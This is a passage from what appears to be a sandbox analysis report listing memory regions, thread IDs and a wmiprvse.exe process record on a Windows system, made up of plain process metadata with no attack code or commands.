	          end_va = 0x7ffc138a8fff
	     entry_point = 0x7ffc13890000
	     region_type = mapped_file
	            name = "eventaggregation.dll"
	        filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll")

Region:
	              id = 1300
	        start_va = 0x7ffc138b0000
	          end_va = 0x7ffc13948fff
	     entry_point = 0x7ffc138b0000
	     region_type = mapped_file
	            name = "sxs.dll"
	        filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll")

Region:
	              id = 1301
	        start_va = 0x7ffc13950000
	          end_va = 0x7ffc13978fff
	     entry_point = 0x7ffc13950000
	     region_type = mapped_file
	            name = "bcrypt.dll"
	        filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")

Region:
	              id = 1302
	        start_va = 0x7ffc13a20000
	          end_va = 0x7ffc13a33fff
	     entry_point = 0x7ffc13a20000
	     region_type = mapped_file
	            name = "profapi.dll"
	        filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")

Region:
	              id = 1303
	        start_va = 0x7ffc13a40000
	          end_va = 0x7ffc13a8afff
	     entry_point = 0x7ffc13a40000
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")

Region:
	              id = 1304
	        start_va = 0x7ffc13a90000
	          end_va = 0x7ffc13a9ffff
	     entry_point = 0x7ffc13a90000
	     region_type = mapped_file
	            name = "msasn1.dll"
	        filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")

Region:
	              id = 1305
	        start_va = 0x7ffc13aa0000
	          end_va = 0x7ffc13aaefff
	     entry_point = 0x7ffc13aa0000
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")

Region:
	              id = 1306
	        start_va = 0x7ffc13b60000
	          end_va = 0x7ffc13be5fff
	     entry_point = 0x7ffc13b60000
	     region_type = mapped_file
	            name = "firewallapi.dll"
	        filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll")

Region:
	              id = 1307
	        start_va = 0x7ffc13bf0000
	          end_va = 0x7ffc13c44fff
	     entry_point = 0x7ffc13bf0000
	     region_type = mapped_file
	            name = "wintrust.dll"
	        filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")

Region:
	              id = 1308
	        start_va = 0x7ffc13c50000
	          end_va = 0x7ffc14293fff
	     entry_point = 0x7ffc13c50000
	     region_type = mapped_file
	            name = "windows.storage.dll"
	        filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")

Region:
	              id = 1309
	        start_va = 0x7ffc142a0000
	          end_va = 0x7ffc142b6fff
	     entry_point = 0x7ffc142a0000
	     region_type = mapped_file
	            name = "netapi32.dll"
	        filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")

Region:
	              id = 1310
	        start_va = 0x7ffc142c0000
	          end_va = 0x7ffc14486fff
	     entry_point = 0x7ffc142c0000
	     region_type = mapped_file
	            name = "crypt32.dll"
	        filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")

Region:
	              id = 1311
	        start_va = 0x7ffc14490000
	          end_va = 0x7ffc144d2fff
	     entry_point = 0x7ffc14490000
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")

Region:
	              id = 1312
	        start_va = 0x7ffc144e0000
	          end_va = 0x7ffc14549fff
	     entry_point = 0x7ffc144e0000
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")

Region:
	              id = 1313
	        start_va = 0x7ffc14550000
	          end_va = 0x7ffc14737fff
	     entry_point = 0x7ffc14550000
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 1314
	        start_va = 0x7ffc14740000
	          end_va = 0x7ffc147f4fff
	     entry_point = 0x7ffc14740000
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")

Region:
	              id = 1315
	        start_va = 0x7ffc14800000
	          end_va = 0x7ffc14942fff
	     entry_point = 0x7ffc14800000
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")

Region:
	              id = 1316
	        start_va = 0x7ffc14950000
	          end_va = 0x7ffc14a6bfff
	     entry_point = 0x7ffc14950000
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")

Region:
	              id = 1317
	        start_va = 0x7ffc14a70000
	          end_va = 0x7ffc15fcefff
	     entry_point = 0x7ffc14a70000
	     region_type = mapped_file
	            name = "shell32.dll"
	        filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")

Region:
	              id = 1318
	        start_va = 0x7ffc15fd0000
	          end_va = 0x7ffc1624cfff
	     entry_point = 0x7ffc15fd0000
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")

Region:
	              id = 1319
	        start_va = 0x7ffc16250000
	          end_va = 0x7ffc162f6fff
	     entry_point = 0x7ffc16250000
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")

Region:
	              id = 1320
	        start_va = 0x7ffc164b0000
	          end_va = 0x7ffc1654cfff
	     entry_point = 0x7ffc164b0000
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 1321
	        start_va = 0x7ffc16550000
	          end_va = 0x7ffc165f6fff
	     entry_point = 0x7ffc16550000
	     region_type = mapped_file
	            name = "clbcatq.dll"
	        filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")

Region:
	              id = 1322
	        start_va = 0x7ffc16600000
	          end_va = 0x7ffc1665bfff
	     entry_point = 0x7ffc16600000
	     region_type = mapped_file
	            name = "wldap32.dll"
	        filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")

Region:
	              id = 1323
	        start_va = 0x7ffc16660000
	          end_va = 0x7ffc166bafff
	     entry_point = 0x7ffc16660000
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")

Region:
	              id = 1324
	        start_va = 0x7ffc16970000
	          end_va = 0x7ffc169dafff
	     entry_point = 0x7ffc16970000
	     region_type = mapped_file
	            name = "ws2_32.dll"
	        filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")

Region:
	              id = 1325
	        start_va = 0x7ffc169e0000
	          end_va = 0x7ffc16b65fff
	     entry_point = 0x7ffc169e0000
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")

Region:
	              id = 1326
	        start_va = 0x7ffc16b70000
	          end_va = 0x7ffc16f98fff
	     entry_point = 0x7ffc16b70000
	     region_type = mapped_file
	            name = "setupapi.dll"
	        filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")

Region:
	              id = 1327
	        start_va = 0x7ffc16fa0000
	          end_va = 0x7ffc16fa7fff
	     entry_point = 0x7ffc16fa0000
	     region_type = mapped_file
	            name = "nsi.dll"
	        filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")

Region:
	              id = 1328
	        start_va = 0x7ffc16fb0000
	          end_va = 0x7ffc17070fff
	     entry_point = 0x7ffc16fb0000
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")

Region:
	              id = 1329
	        start_va = 0x7ffc17120000
	          end_va = 0x7ffc171ccfff
	     entry_point = 0x7ffc17120000
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 1330
	        start_va = 0x7ffc171d0000
	          end_va = 0x7ffc17325fff
	     entry_point = 0x7ffc171d0000
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")

Region:
	              id = 1331
	        start_va = 0x7ffc173a0000
	          end_va = 0x7ffc173f1fff
	     entry_point = 0x7ffc173a0000
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")

Region:
	              id = 1332
	        start_va = 0x7ffc17400000
	          end_va = 0x7ffc175c0fff
	     entry_point = 0x7ffc17400000
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 1366
	        start_va = 0x2a90c80000
	          end_va = 0x2a90d7ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a90c80000"
	        filename = ""

Region:
	              id = 1367
	        start_va = 0x2a90d80000
	          end_va = 0x2a90e7ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a90d80000"
	        filename = ""

Region:
	              id = 1368
	        start_va = 0x2a90e80000
	          end_va = 0x2a90f7ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a90e80000"
	        filename = ""

Region:
	              id = 1369
	        start_va = 0x7ffc101c0000
	          end_va = 0x7ffc101d7fff
	     entry_point = 0x7ffc101c0000
	     region_type = mapped_file
	            name = "elscore.dll"
	        filename = "\\Windows\\System32\\ELSCore.dll" (normalized: "c:\\windows\\system32\\elscore.dll")

Region:
	              id = 1370
	        start_va = 0x7ffbf7770000
	          end_va = 0x7ffbf777bfff
	     entry_point = 0x7ffbf7770000
	     region_type = mapped_file
	            name = "elstrans.dll"
	        filename = "\\Windows\\System32\\elsTrans.dll" (normalized: "c:\\windows\\system32\\elstrans.dll")

Region:
	              id = 1371
	        start_va = 0x2a90f80000
	          end_va = 0x2a9107ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a90f80000"
	        filename = ""

Region:
	              id = 1372
	        start_va = 0x16572b20000
	          end_va = 0x16572b22fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000016572b20000"
	        filename = ""

Region:
	              id = 1373
	        start_va = 0x16572e70000
	          end_va = 0x16572e73fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000016572e70000"
	        filename = ""

Region:
	              id = 1374
	        start_va = 0x7ffbf6ee0000
	          end_va = 0x7ffbf6feefff
	     entry_point = 0x7ffbf6ee0000
	     region_type = mapped_file
	            name = "dosvc.dll"
	        filename = "\\Windows\\System32\\dosvc.dll" (normalized: "c:\\windows\\system32\\dosvc.dll")

Region:
	              id = 1375
	        start_va = 0x7ffc08000000
	          end_va = 0x7ffc08009fff
	     entry_point = 0x7ffc08000000
	     region_type = mapped_file
	            name = "version.dll"
	        filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")

Region:
	              id = 2454
	        start_va = 0x2a92580000
	          end_va = 0x2a925fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a92580000"
	        filename = ""

Region:
	              id = 2455
	        start_va = 0x2a92600000
	          end_va = 0x2a9267ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000002a92600000"
	        filename = ""

Region:
	              id = 2456
	        start_va = 0x1656eca0000
	          end_va = 0x1656eca0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001656eca0000"
	        filename = ""

Region:
	              id = 2457
	        start_va = 0x1656ecd0000
	          end_va = 0x1656ecd0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001656ecd0000"
	        filename = ""

Region:
	              id = 2458
	        start_va = 0x1656fd40000
	          end_va = 0x1656fd4ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001656fd40000"
	        filename = ""

Region:
	              id = 2459
	        start_va = 0x1656fda0000
	          end_va = 0x1656fdedfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001656fda0000"
	        filename = ""

Region:
	              id = 2460
	        start_va = 0x1656fdf0000
	          end_va = 0x1656fdf3fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001656fdf0000"
	        filename = ""

Region:
	              id = 2461
	        start_va = 0x1656fe00000
	          end_va = 0x1656fe0ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001656fe00000"
	        filename = ""

Region:
	              id = 2462
	        start_va = 0x1656fe10000
	          end_va = 0x1656fe1ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001656fe10000"
	        filename = ""

Region:
	              id = 2463
	        start_va = 0x1656fe20000
	          end_va = 0x1656fe20fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001656fe20000"
	        filename = ""

Region:
	              id = 2464
	        start_va = 0x1656fef0000
	          end_va = 0x1656fef0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001656fef0000"
	        filename = ""

Region:
	              id = 2465
	        start_va = 0x16570300000
	          end_va = 0x16570303fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016570300000"
	        filename = ""

Region:
	              id = 2466
	        start_va = 0x16570310000
	          end_va = 0x16570311fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016570310000"
	        filename = ""

Region:
	              id = 2467
	        start_va = 0x16570320000
	          end_va = 0x16570320fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016570320000"
	        filename = ""

Region:
	              id = 2468
	        start_va = 0x16570330000
	          end_va = 0x1657033ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016570330000"
	        filename = ""

Region:
	              id = 2469
	        start_va = 0x16570350000
	          end_va = 0x1657036ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016570350000"
	        filename = ""

Region:
	              id = 2470
	        start_va = 0x16570370000
	          end_va = 0x16570373fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016570370000"
	        filename = ""

Region:
	              id = 2471
	        start_va = 0x16570380000
	          end_va = 0x16570381fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016570380000"
	        filename = ""

Region:
	              id = 2472
	        start_va = 0x16570390000
	          end_va = 0x1657039ffff
	     entry_point = 0x16570390000
	     region_type = mapped_file
	            name = "datastore.edb"
	        filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")

Region:
	              id = 2473
	        start_va = 0x165703a0000
	          end_va = 0x165703affff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000165703a0000"
	        filename = ""

Region:
	              id = 2474
	        start_va = 0x16571710000
	          end_va = 0x16571713fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016571710000"
	        filename = ""

Region:
	              id = 2475
	        start_va = 0x16573300000
	          end_va = 0x165733fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016573300000"
	        filename = ""

Region:
	              id = 2476
	        start_va = 0x16573400000
	          end_va = 0x1657348bfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000016573400000"
	        filename = ""

Region:
	              id = 2477
	        start_va = 0x16573500000
	          end_va = 0x165735fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016573500000"
	        filename = ""

Region:
	              id = 2478
	        start_va = 0x16573600000
	          end_va = 0x165736fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016573600000"
	        filename = ""

Region:
	              id = 2479
	        start_va = 0x16573700000
	          end_va = 0x165737fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016573700000"
	        filename = ""

Region:
	              id = 2480
	        start_va = 0x16573800000
	          end_va = 0x165738fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016573800000"
	        filename = ""

Region:
	              id = 2481
	        start_va = 0x16573900000
	          end_va = 0x165739fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016573900000"
	        filename = ""

Region:
	              id = 2482
	        start_va = 0x16573a00000
	          end_va = 0x16573afffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016573a00000"
	        filename = ""

Region:
	              id = 2483
	        start_va = 0x16573b00000
	          end_va = 0x16573bfffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000016573b00000"
	        filename = ""


Thread:
	id = 45
	os_tid = 0x2cc


Thread:
	id = 46
	os_tid = 0x650


Thread:
	id = 47
	os_tid = 0x2d0


Thread:
	id = 48
	os_tid = 0xd38


Thread:
	id = 49
	os_tid = 0xd3c


Thread:
	id = 50
	os_tid = 0x500


Thread:
	id = 51
	os_tid = 0xcf8


Thread:
	id = 52
	os_tid = 0xd2c


Thread:
	id = 53
	os_tid = 0xd00


Thread:
	id = 54
	os_tid = 0xc98


Thread:
	id = 55
	os_tid = 0xb24


Thread:
	id = 56
	os_tid = 0x82c


Thread:
	id = 57
	os_tid = 0x14c


Thread:
	id = 58
	os_tid = 0x1ac


Thread:
	id = 59
	os_tid = 0xb74


Thread:
	id = 60
	os_tid = 0x360


Thread:
	id = 61
	os_tid = 0x2f0


Thread:
	id = 62
	os_tid = 0x19c


Thread:
	id = 63
	os_tid = 0x3cc


Thread:
	id = 64
	os_tid = 0x3d0


Thread:
	id = 65
	os_tid = 0x314


Thread:
	id = 66
	os_tid = 0x4e4


Thread:
	id = 67
	os_tid = 0x310


Thread:
	id = 68
	os_tid = 0xd0c


Thread:
	id = 69
	os_tid = 0xd08


Thread:
	id = 70
	os_tid = 0xa38


Thread:
	id = 71
	os_tid = 0xb14


Thread:
	id = 72
	os_tid = 0x8a0


Thread:
	id = 73
	os_tid = 0x8d8


Thread:
	id = 74
	os_tid = 0x828


Thread:
	id = 75
	os_tid = 0x930


Thread:
	id = 76
	os_tid = 0x678


Thread:
	id = 77
	os_tid = 0x418


Thread:
	id = 78
	os_tid = 0xa84


Thread:
	id = 79
	os_tid = 0xa58


Thread:
	id = 80
	os_tid = 0xa64


Thread:
	id = 81
	os_tid = 0x484


Thread:
	id = 82
	os_tid = 0x85c


Thread:
	id = 83
	os_tid = 0x46c


Thread:
	id = 84
	os_tid = 0xba0


Thread:
	id = 85
	os_tid = 0x9dc


Thread:
	id = 86
	os_tid = 0x42c


Thread:
	id = 87
	os_tid = 0x4b0


Thread:
	id = 88
	os_tid = 0x7ec


Thread:
	id = 89
	os_tid = 0x670


Thread:
	id = 90
	os_tid = 0x5c4


Thread:
	id = 91
	os_tid = 0x5e0


Thread:
	id = 92
	os_tid = 0x5d0


Thread:
	id = 93
	os_tid = 0x8


Thread:
	id = 94
	os_tid = 0x554


Thread:
	id = 95
	os_tid = 0x410


Thread:
	id = 96
	os_tid = 0x2c4


Thread:
	id = 97
	os_tid = 0x404


Thread:
	id = 98
	os_tid = 0x7fc


Thread:
	id = 99
	os_tid = 0x7f0


Thread:
	id = 100
	os_tid = 0x7d4


Thread:
	id = 101
	os_tid = 0x7d0


Thread:
	id = 102
	os_tid = 0x7c4


Thread:
	id = 103
	os_tid = 0x7c0


Thread:
	id = 104
	os_tid = 0x7b8


Thread:
	id = 105
	os_tid = 0x79c


Thread:
	id = 106
	os_tid = 0x76c


Thread:
	id = 107
	os_tid = 0x700


Thread:
	id = 108
	os_tid = 0x6d0


Thread:
	id = 109
	os_tid = 0x67c


Thread:
	id = 110
	os_tid = 0x66c


Thread:
	id = 111
	os_tid = 0x668


Thread:
	id = 112
	os_tid = 0x648


Thread:
	id = 113
	os_tid = 0x638


Thread:
	id = 114
	os_tid = 0x63c


Thread:
	id = 115
	os_tid = 0x624


Thread:
	id = 116
	os_tid = 0x5cc


Thread:
	id = 117
	os_tid = 0x588


Thread:
	id = 118
	os_tid = 0x568


Thread:
	id = 119
	os_tid = 0x4a0


Thread:
	id = 120
	os_tid = 0x478


Thread:
	id = 121
	os_tid = 0x470


Thread:
	id = 122
	os_tid = 0x428


Thread:
	id = 123
	os_tid = 0x408


Thread:
	id = 124
	os_tid = 0x2e8


Thread:
	id = 125
	os_tid = 0x254


Thread:
	id = 126
	os_tid = 0x1ec


Thread:
	id = 127
	os_tid = 0x118


Thread:
	id = 128
	os_tid = 0x1dc


Thread:
	id = 129
	os_tid = 0x184


Thread:
	id = 130
	os_tid = 0x188


Thread:
	id = 131
	os_tid = 0x198


Thread:
	id = 132
	os_tid = 0x15c


Thread:
	id = 133
	os_tid = 0x158


Thread:
	id = 134
	os_tid = 0x124


Thread:
	id = 135
	os_tid = 0xe4


Thread:
	id = 136
	os_tid = 0x3fc


Thread:
	id = 137
	os_tid = 0x3f8


Thread:
	id = 138
	os_tid = 0x3bc


Thread:
	id = 139
	os_tid = 0xe3c


Thread:
	id = 140
	os_tid = 0xe1c


Thread:
	id = 141
	os_tid = 0xe18


Thread:
	id = 143
	os_tid = 0x8a8


Thread:
	id = 144
	os_tid = 0x414


Thread:
	id = 145
	os_tid = 0x8a4


Thread:
	id = 146
	os_tid = 0xd40


Thread:
	id = 147
	os_tid = 0xd4c


Thread:
	id = 148
	os_tid = 0xd44


Thread:
	id = 149
	os_tid = 0xe0c


Thread:
	id = 150
	os_tid = 0xe60


Thread:
	id = 168
	os_tid = 0xdd4


Thread:
	id = 169
	os_tid = 0xdc8


Thread:
	id = 170
	os_tid = 0xdc0


Thread:
	id = 193
	os_tid = 0xa48


Thread:
	id = 194
	os_tid = 0x2ec


Thread:
	id = 195
	os_tid = 0xdc


Thread:
	id = 203
	os_tid = 0xb10


Thread:
	id = 204
	os_tid = 0x2dc


Thread:
	id = 205
	os_tid = 0xff4


Thread:
	id = 207
	os_tid = 0xe30


Thread:
	id = 236
	os_tid = 0xe20


Thread:
	id = 237
	os_tid = 0xdf8


Thread:
	id = 247
	os_tid = 0xb74


Thread:
	id = 249
	os_tid = 0xcc8


Thread:
	id = 257
	os_tid = 0xdd8


Thread:
	id = 258
	os_tid = 0xdc4


Thread:
	id = 259
	os_tid = 0xdcc


Process:
	id = "6"
	image_name = "wmiprvse.exe"
	filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe"
	page_root = "0x57e2a000"
	os_pid = "0x1e0"
	os_integrity_level = "0x4000"
	os_privileges = "0x60800000"
	monitor_reason = "rpc_server"
	parent_id = "5"
	os_parent_pid = "0x3b8"
	cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "NT AUTHORITY\\Network Service"
	os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:00037231" [0xc000000f]

Region:
	              id = 1524
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 1525
	        start_va = 0x8131540000
	          end_va = 0x81315bffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008131540000"
	        filename = ""

Region:
	              id = 1526
	        start_va = 0x8131600000
	          end_va = 0x81317fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008131600000"
	        filename = ""

Region:
	              id = 1527
	        start_va = 0x8131800000
	          end_va = 0x813187ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008131800000"
	        filename = ""

Region:
	              id = 1528
	        start_va = 0x8131900000
	          end_va = 0x813197ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008131900000"
	        filename = ""

Region:
	              id = 1529
	        start_va = 0x8131980000
	          end_va = 0x81319fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008131980000"
	        filename = ""

Region:
	              id = 1530
	        start_va = 0x8131a00000
	          end_va = 0x8131a7ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008131a00000"
	        filename = ""

Region:
	              id = 1531
	        start_va = 0x8131a80000
	          end_va = 0x8131afffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008131a80000"
	        filename = ""

Region:
	              id = 1532
	        start_va = 0x8131b00000
	          end_va = 0x8131b7ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008131b00000"
	        filename = ""

Region:
	              id = 1533
	        start_va = 0x8131b80000
	          end_va = 0x8131bfffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008131b80000"
	        filename = ""

Region:
	              id = 1534
	        start_va = 0x8131c00000
	          end_va = 0x8131c7ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008131c00000"
	        filename = ""

Region:
	              id = 1535
	        start_va = 0x8131c80000
	          end_va = 0x8131cfffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008131c80000"
	        filename = ""

Region:
	              id = 1536
	        start_va = 0x1fe564c0000
	          end_va = 0x1fe564cffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001fe564c0000"
	        filename = ""

Region:
	              id = 1537
	        start_va = 0x1fe564d0000
	          end_va = 0x1fe564d6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001fe564d0000"
	        filename = ""

Region:
	              id = 1538
	        start_va = 0x1fe564e0000
	          end_va = 0x1fe564f4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001fe564e0000"
	        filename = ""

Region:
	              id = 1539
	        start_va = 0x1fe56500000
	          end_va = 0x1fe56503fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001fe56500000"
	        filename = ""

Region:
	              id = 1540
	        start_va = 0x1fe56510000
	          end_va = 0x1fe56510fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001fe56510000"
	        filename = ""

Region:
	              id = 1541
	        start_va = 0x1fe56520000
	          end_va = 0x1fe56521fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001fe56520000"
	        filename = ""

Region:
	              id = 1542
	        start_va = 0x1fe56530000
	          end_va = 0x1fe565edfff
	     entry_point = 0x1fe56530000
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 1543
	        start_va = 0x1fe565f0000
	          end_va = 0x1fe565f6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001fe565f0000"
	        filename = ""

Region:
	              id = 1544
	        start_va = 0x1fe56600000
	          end_va = 0x1fe566bffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001fe56600000"
	        filename = ""

Region:
	              id = 1545
	        start_va = 0x1fe566c0000
	          end_va = 0x1fe566c0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001fe566c0000"
	        filename = ""

Region:
	              id = 1546
	        start_va = 0x1fe566d0000
	          end_va = 0x1fe566d0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001fe566d0000"
	        filename = ""

Region:
	              id = 1547
	        start_va = 0x1fe566e0000
	          end_va = 0x1fe566e1fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001fe566e0000"
	        filename = ""

Region:
	              id = 1548
	        start_va = 0x1fe566f0000
	          end_va = 0x1fe566f0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001fe566f0000"
	        filename = ""

Region:
	              id = 1549
	        start_va = 0x1fe56700000
	          end_va = 0x1fe567fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001fe56700000"
	        filename = ""

Region:
	              id = 1550
	        start_va = 0x1fe56800000
	          end_va = 0x1fe5688bfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001fe56800000"
	        filename = ""

Region:
	              id = 1551
	        start_va = 0x1fe56890000
	          end_va = 0x1fe56890fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001fe56890000"
	        filename = ""

Region:
	              id = 1552
	        start_va = 0x1fe568a0000
	          end_va = 0x1fe568a0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001fe568a0000"
	        filename = ""

Region:
	              id = 1553
	        start_va = 0x1fe568b0000
	          end_va = 0x1fe568b0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001fe568b0000"
	        filename = ""

Region:
	              id = 1554
	        start_va = 0x1fe568c0000
